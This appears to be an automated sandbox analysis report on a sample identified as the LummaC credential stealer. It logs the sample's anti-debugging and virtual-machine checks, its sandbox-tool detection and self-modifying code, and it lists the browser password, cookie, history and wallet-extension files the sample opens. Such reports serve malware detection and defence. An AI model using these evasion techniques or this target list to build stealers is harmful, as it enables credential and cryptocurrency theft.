Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0DA1 second address: 52F0DCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD224Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F987E0B5E19h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F980CCD2250h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0DCC second address: 52F0DDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B1F second address: 5300B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B23 second address: 5300B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B29 second address: 5300B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B2F second address: 5300B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B33 second address: 5300B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B37 second address: 5300B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B46 second address: 5300B56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD224Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B56 second address: 5300B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F980CD044E1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B6C second address: 5300B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300B79 second address: 5300BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F980CD044DBh 0x0000000a adc si, B84Eh 0x0000000f jmp 00007F980CD044E9h 0x00000014 popfd 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300BB1 second address: 5300BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300BB5 second address: 5300BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300BC8 second address: 5300BEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD2259h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300BEC second address: 5300BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300BF0 second address: 5300BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300BF6 second address: 5300C1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F980CD044DEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300C1D second address: 5300CB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, F464h 0x00000007 jmp 00007F980CCD224Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, esi 0x00000010 jmp 00007F980CCD224Eh 0x00000015 mov esi, dword ptr [ebp+0Ch] 0x00000018 pushad 0x00000019 movzx esi, di 0x0000001c mov edi, 39924B2Eh 0x00000021 popad 0x00000022 test esi, esi 0x00000024 pushad 0x00000025 mov eax, ebx 0x00000027 jmp 00007F980CCD2257h 0x0000002c popad 0x0000002d je 00007F987E0AF990h 0x00000033 jmp 00007F980CCD2256h 0x00000038 cmp dword ptr [7674459Ch], 05h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov edx, 26E775F0h 0x00000047 jmp 00007F980CCD2259h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300CB2 second address: 5300CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F987E0F9CA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300CD3 second address: 5300CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD224Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300E1B second address: 5300E48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F980CD044DDh 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 1067788 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 1092C41 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: EC5D13 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 10F9934 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\random.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\W2U54XWUYRFYVUMBYUAR0TMO04229I.exe

Jump to dropped file

Source: C:\Users\user\Desktop\random.exe TID: 6360	Thread sleep count: 89 > 30	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6360	Thread sleep time: -178089s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6252	Thread sleep count: 98 > 30	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6252	Thread sleep time: -196098s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6748	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6320	Thread sleep count: 94 > 30	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6320	Thread sleep time: -188094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6644	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6348	Thread sleep count: 99 > 30	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6348	Thread sleep time: -198099s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6304	Thread sleep count: 98 > 30	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6304	Thread sleep time: -196098s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6300	Thread sleep count: 109 > 30	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6300	Thread sleep time: -218109s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: random.exe, 00000000.00000002.1533656962.000000000104A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: random.exe, random.exe, 00000000.00000002.1534851635.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1532514507.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1532257234.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1014880251.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.998464860.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1008085537.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.955875528.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031386733.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1534936154.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: random.exe, 00000000.00000003.971142640.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: random.exe, 00000000.00000003.1532514507.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1014880251.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.998464860.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1008085537.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.955875528.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031386733.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1534936154.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: random.exe, 00000000.00000002.1533656962.000000000104A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: random.exe, 00000000.00000003.971142640.0000000005D73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\random.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\random.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\random.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\random.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\random.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\random.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\random.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\random.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\random.exe	File opened: NTICE
Source: C:\Users\user\Desktop\random.exe	File opened: SICE
Source: C:\Users\user\Desktop\random.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior

Source: random.exe, 00000000.00000002.1534016120.0000000001090000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: rBrProgram Manager

Source: C:\Users\user\Desktop\random.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: random.exe, 00000000.00000003.1008085537.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1008209893.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1008085537.000000000153A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1532235910.0000000001537000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1014880251.000000000153A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535128415.0000000001541000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1008085537.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031622912.000000000153B000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1008300679.000000000153B000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031386733.000000000153A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1532716476.0000000001540000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\random.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
